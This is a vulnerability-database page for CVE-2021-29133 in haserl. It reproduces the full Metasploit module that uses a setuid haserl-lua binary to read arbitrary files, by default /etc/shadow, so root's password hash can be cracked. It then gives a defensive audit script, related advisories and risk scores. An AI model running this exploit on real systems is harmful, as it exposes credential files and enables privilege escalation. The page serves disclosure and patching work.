
Haserl Arbitrary File Reader

09 Apr 2021 17:42:41 | Reported by: Julien (jvoisin) Voisin, Ike Broflovski | Type: metasploit | Source: www.rapid7.com

The Haserl Arbitrary File Reader module exploits haserl prior to 0.9.36 to read arbitrary files, including /etc/shadow.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| AlpineLinux | CVE-2021-29133 | 24 Mar 2021 06:32 | alpinelinux |
| Circl | CVE-2021-29133 | 9 Apr 2021 11:17 | circl |
| CNNVD | Alpine Linux security vulnerability | 24 Mar 2021 00:00 | cnnvd |
| CVE | CVE-2021-29133 | 24 Mar 2021 06:32 | cve |
| Cvelist | CVE-2021-29133 | 24 Mar 2021 06:32 | cvelist |
| EUVD | EUVD-2021-15774 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2021-29133 | 24 Mar 2021 07:15 | nvd |
| Tenable Nessus | openSUSE 15 Security Update : haserl (openSUSE-SU-2021:1279-1) | 17 Sep 2021 00:00 | nessus |
| OPENSUSE Linux | Security update for haserl (moderate) | 16 Sep 2021 00:00 | opensuse |
| OpenVAS | openSUSE: Security Advisory for haserl (openSUSE-SU-2021:1279-1) | 17 Sep 2021 00:00 | openvas |

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Haserl Arbitrary File Reader',
        'Description' => %q{
          This module exploits haserl prior to 0.9.36 to read arbitrary files.
          The most widely accepted exploitation vector is reading /etc/shadow,
          which will reveal root's hash for cracking.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Julien (jvoisin) Voisin', # metasploit module
          'Ike Broflovski' # discovery
        ],
        'Platform' => [ 'linux' ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'References' => [
          ['URL', 'https://twitter.com/steaIth/status/1364940271054712842'],
          ['URL', 'https://gitlab.alpinelinux.org/alpine/aports/-/issues/12539'],
          ['CVE', '2021-29133']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )
    register_options([
      OptString.new('RFILE', [true, 'File to read', '/etc/shadow']),
    ])
  end

  def haserl_lua_paths
    begin
      files = get_suid_files('/usr/bin')
    rescue StandardError
      return
    end

    return unless files

    return files.select { |f| File.basename(f).starts_with?('haserl-lua') }
  end

  def run
    if is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges')
    end

    files = haserl_lua_paths

    if files.nil? || files.empty?
      fail_with(Failure::NotVulnerable, 'Could not find setuid haserl lua executable in /usr/bin/')
    end

    binary = files.first

    print_good("Found set-uid haserl: #{binary}")

    output = cmd_exec("#{binary} '#{datastore['RFILE']}'")

    return if output.empty?

    fname = File.basename(datastore['RFILE'].downcase)
    p = store_loot(
      "haserl_#{fname}",
      'text/plain',
      session,
      output,
      "haserl_#{fname}",
      'haserl arbitrary read'
    )
    vprint_good("#{fname} saved in: #{p}")
  end
end
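
A defender-side check for the condition this module looks for (a setuid `haserl-lua*` binary on a haserl release older than 0.9.36), as an added example that is not part of the Metasploit module or the haserl project. The function names are hypothetical, and the installed haserl version is assumed to be supplied by the operator from the package manager.

```shell
#!/bin/sh
# Added audit example; not part of the Metasploit module or of haserl.
FIXED_VERSION="0.9.36"  # first fixed release, per the module description

# version_lt A B: succeed when dotted numeric version A is older than B.
version_lt() {
    a=$1 b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; y=${b%%.*}
        [ "${x:-0}" -lt "${y:-0}" ] && return 0
        [ "${x:-0}" -gt "${y:-0}" ] && return 1
        case $a in *.*) a=${a#*.} ;; *) a= ;; esac
        case $b in *.*) b=${b#*.} ;; *) b= ;; esac
    done
    return 1  # equal versions are not "older"
}

# find_suid_haserl DIR: list setuid files under DIR named haserl-lua*,
# the same name and permission filter the module applies to /usr/bin.
find_suid_haserl() {
    find "$1" -type f -name 'haserl-lua*' -perm -4000 2>/dev/null || true
}

# audit_haserl DIR VERSION: report exposed binaries; return 1 when a setuid
# haserl-lua exists and VERSION (operator-supplied) predates the fix.
audit_haserl() {
    ver=${2%%-*}  # drop a package revision suffix such as "-r1"
    hits=$(find_suid_haserl "$1")
    [ -z "$hits" ] && { echo "OK: no setuid haserl-lua under $1"; return 0; }
    if version_lt "$ver" "$FIXED_VERSION"; then
        echo "$hits" | while read -r f; do
            echo "VULNERABLE: $f (haserl $ver < $FIXED_VERSION)"
        done
        echo "Mitigate: upgrade haserl, or drop the bit with chmod u-s"
        return 1
    fi
    echo "OK: setuid haserl-lua present, haserl $ver is not affected"
    return 0
}

# Usage: sh audit.sh /usr/bin 0.9.35
if [ "$#" -ge 2 ]; then audit_haserl "$1" "$2"; fi
```
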


Scores (current as of 18 Feb 2026 18:59):
Vulners AI Score: 5.4 (Medium risk)
CVSS 2: 2.1
CVSS 3.1: 5.5
EPSS: 0.01953